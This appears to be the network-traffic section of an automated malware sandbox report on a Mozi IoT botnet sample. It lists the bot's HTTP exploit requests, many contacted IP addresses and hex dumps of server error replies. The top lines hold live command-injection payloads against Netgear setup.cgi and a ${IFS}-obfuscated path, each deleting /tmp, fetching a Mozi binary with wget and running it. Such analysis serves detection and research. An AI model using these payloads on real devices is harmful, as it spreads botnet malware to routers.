Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 45.134.0.236
Source: unknown TCP traffic detected without corresponding DNS query: 113.200.105.232
Source: unknown TCP traffic detected without corresponding DNS query: 67.129.160.73
Source: unknown TCP traffic detected without corresponding DNS query: 184.11.167.170
Source: unknown TCP traffic detected without corresponding DNS query: 109.102.232.127
Source: unknown TCP traffic detected without corresponding DNS query: 105.61.103.103
Source: unknown TCP traffic detected without corresponding DNS query: 166.31.23.109
Source: unknown TCP traffic detected without corresponding DNS query: 35.45.112.6
Source: unknown TCP traffic detected without corresponding DNS query: 22.144.232.185
Source: unknown TCP traffic detected without corresponding DNS query: 100.196.47.140
Source: unknown TCP traffic detected without corresponding DNS query: 215.43.78.87
Source: unknown TCP traffic detected without corresponding DNS query: 86.26.124.100
Source: unknown TCP traffic detected without corresponding DNS query: 220.130.213.29
Source: unknown TCP traffic detected without corresponding DNS query: 111.249.251.6
Source: unknown TCP traffic detected without corresponding DNS query: 55.245.84.60
Source: unknown TCP traffic detected without corresponding DNS query: 200.186.246.157
Source: unknown TCP traffic detected without corresponding DNS query: 102.5.129.5
Source: unknown TCP traffic detected without corresponding DNS query: 137.64.79.56
Source: unknown TCP traffic detected without corresponding DNS query: 185.119.191.5
Source: unknown TCP traffic detected without corresponding DNS query: 21.235.94.156
Source: unknown TCP traffic detected without corresponding DNS query: 65.53.76.53
Source: unknown TCP traffic detected without corresponding DNS query: 192.79.212.170
Source: unknown TCP traffic detected without corresponding DNS query: 171.179.128.100
Source: unknown TCP traffic detected without corresponding DNS query: 72.88.15.204
Source: unknown TCP traffic detected without corresponding DNS query: 45.25.57.240
Source: unknown TCP traffic detected without corresponding DNS query: 218.50.181.147
Source: unknown TCP traffic detected without corresponding DNS query: 126.28.245.2
Source: unknown TCP traffic detected without corresponding DNS query: 40.107.51.226
Source: unknown TCP traffic detected without corresponding DNS query: 216.205.149.24
Source: unknown TCP traffic detected without corresponding DNS query: 126.36.55.25
Source: unknown TCP traffic detected without corresponding DNS query: 90.228.187.181
Source: unknown TCP traffic detected without corresponding DNS query: 29.252.61.177
Source: unknown TCP traffic detected without corresponding DNS query: 188.126.206.174
Source: unknown TCP traffic detected without corresponding DNS query: 35.183.126.209
Source: unknown TCP traffic detected without corresponding DNS query: 125.19.179.159
Source: unknown TCP traffic detected without corresponding DNS query: 29.90.179.91
Source: unknown TCP traffic detected without corresponding DNS query: 52.178.207.54
Source: unknown TCP traffic detected without corresponding DNS query: 187.0.181.7
Source: unknown TCP traffic detected without corresponding DNS query: 198.194.3.135
Source: unknown TCP traffic detected without corresponding DNS query: 180.254.127.131
Source: unknown TCP traffic detected without corresponding DNS query: 179.194.207.199
Source: unknown TCP traffic detected without corresponding DNS query: 105.25.244.131
Source: unknown TCP traffic detected without corresponding DNS query: 91.8.221.112
Source: unknown TCP traffic detected without corresponding DNS query: 118.24.78.63
Source: unknown TCP traffic detected without corresponding DNS query: 199.238.225.170
Source: unknown TCP traffic detected without corresponding DNS query: 182.6.67.113
Source: unknown TCP traffic detected without corresponding DNS query: 154.2.250.169
Source: unknown TCP traffic detected without corresponding DNS query: 93.65.82.228
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 12:57:32 GMTServer: Apache/2.2.3 (Debian)Content-Length: 290Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Thu, 25 Jun 1970 01:00:08 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 12:58:23 GMTContent-Type: text/htmlContent-Length: 566Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:58:42 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingServer: cloudflareCF-RAY: 6d4a657b6cc89137-FRAContent-Encoding: gzipData Raw: 35 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 57 5b 6f db 36 14 7e f7 af 38 d5 80 ee 25 b4 2c 27 71 5c 47 d6 50 a4 19 96 a7 05 5b 82 ad 28 0a 83 22 8f 2c 26 14 a9 92 f4 0d db fe fb 40 51 72 e5 38 cd da 87 62 7e 31 af 1f cf e5 3b 17 a5 af de fd 7a 75 f7 fe f6 1a 4a 57 c9 6c 90 be 22 e4 83 28 40 3a b8 b9 86 8b 8f 19 a4 7e 03 98 a4 d6 ce 23 a5 c9 83 05 81 13 d0 92 0b 8c 40 52 b5 9c 47 a8 c8 fd ef 51 06 e9 ab 0f a8 b8 28 3e 12 f2 19 aa c5 01 78 1e ea e2 db a0 a6 2f 40 4d bf 01 6a e9 5a 34 bf f0 9c 96 c7 28 84 1c 22 95 48 79 36 48 9d 70 12 b3 77 c2 20 73 70 73 0b 94 31 b4 16 94 76 40 a5 d4 1b e4 f0 37 5c 49 bd e2 85 a4 06 d3 38 5c 18 a4 15 3a 0a ac a4 c6 a2 9b 47 f7 77 3f 93 69 04 71 b7 51 3a 57 13 fc b4 12 eb 79 74 a5 95 43 e5 c8 dd ae c6 08 58 98 cd 23 87 5b 17 7b c1 2f f7 30 2f a1 fc 49 ee df 92 2b 5d d5 d4 89 5c f6 81 6e ae e7 d7 7c 89 27 ac 34 ba c2 79 d2 03 50 b4 c2 79 64 74 ae 9d ed dd 50 5a 28 8e db 13 50 ba d0 5e cb a3 2b 6b 81 9b 5a 1b d7 bb b4 11 dc 95 73 8e 6b c1 90 34 93 13 a1 84 13 54 12 cb a8 dc 3f 2c 85 7a 04 83 72 1e 59 b7 93 68 4b 44 17 81 e0 f3 88 15 8b b0 44 98 b5 11 94 06 8b 79 14 33 ae 08 5b 8a 38 6c c5 15 15 6a d8 ec bb 5d 8d ad 99 9a 79 85 5c d0 79 64 99 41 54 27 b5 d1 0f c8 9c d0 aa 79 76 30 48 2d 33 a2 76 c0 b1 40 03 d6 b0 79 e4 ed 67 67 71 4c 6b 31 34 94 53 33 64 7b 4f 0e 99 ae e2 1c 29 d3 6a f8 60 a3 2c 8d c3 fd 6c 90 c6 2d 37 72 cd 77 d9 00 20 e5 62 dd 2a 40 36 86 d6 35 9a c8 af b7 3b 2d ef 58 41 a8 44 e3 a0 1b 10 34 46 1b 3f 65 5a 3f 0a 6c e7 a5 e0 1c 55 6b 91 b0 d1 1c 8f 80 53 47 89 33 54 59 49 1d 7a f2 d2 5c e2 22 1c b2 51 76 2b 91 5a 84 b0 0c ed f2 30 8d b9 58 f7 c4 69 05 6d 1e 23 1c 1d 15 d2 fb 3e 08 59 93 51 2b ba 8f 42 a4 1c 4d b7 55 6d 09 5d 39 0d b5 23 c9 08 e4 72 56 3b 32 69 fe b7 64 0a 1b 32 3e 6b 56 37 a4 58 49 09 55 4e 92 73 a0 ca fb 5f 50 8b 7c 0f db 20 27 1d aa 50 52 28 24 b9 d4 ec 11 2a 3e 6b 07 86 8c fd ac ca c9 18 0a ad 1c 91 62 59 3a f0 ce 26 93 91 df 6a 86 a7 5b 19 d6 72 49 d9 23 e1 d4 3c 82 44 ca 85 5a 12 e7 6f f4 5f 05 48 6d 4d d5 b1 19 bd 25 a2 ec da ff a5 b1 3f 72 7c 29 4b 46 a3 d3 a3 cd 34 2e 93 fe b4 81 7f 51 b1 b2 15 ce d0 1d 11 3c a8 56 69 a5 83 16 c9 b9 b7 60 33 b4 95 1f 76 ba 18 94 74 eb 6d f8 1b dd c1 cd bb 19 4c f8 19 9d 9c 5f e4 13 c6 a6 6f 92 d3 0b 78 9d af a4 bc 3c 96 f0 fb 8b 34 1e 8d c7 64 94 90 f1 14 92 f1 ec fc cd 6c f4 06 ee ef ae 9e 8a 92 96 e3 4e 8e 06 6d e9 df 9b 8c 46 7b 7f 25 c3 53 d8 3b b5 7b 73 bc 95 3d ff 47 2f 26 e2 34 2e c7 7b ee c6 81 bc d9 a0 5b b0 21 19 74 32 1c f1 b5 65 77 95 93 69 47 ea 03 f2 ec 63 67 53 52 47 4a 1f e5 0a
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 6d4a657b98069274-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 33 Data Ascii: error code: 1003
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 28 Jan 2022 12:59:10 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 daeeb7c460b443acd6ac3d0db8e793a8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: TPE52-C1X-Amz-Cf-Id: rT_EXyjGCrOYN6jK3oiEJBLgPD5vlbz5rYP3i1_hLi-jGrIW7R2C1Q==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 72 54 5f 45 58 79 6a 47 43 72 4f 59 4e 36 6a 4b 33 6f 69 45 4a 42 4c 67 50 44 35 76 6c 62 7a 35 72 59 50 33 69 31 5f 68 4c 69 2d 6a 47 72 49 57 37 52 32 43 31 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 211Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 65 74 75 70 2e 63 67 69 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /setup.cgion this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Microsoft-IIS/10.0Date: Fri, 28 Jan 2022 12:59:22 GMTContent-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 13:04:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 13:04:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 28 Jan 2022 13:00:07 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 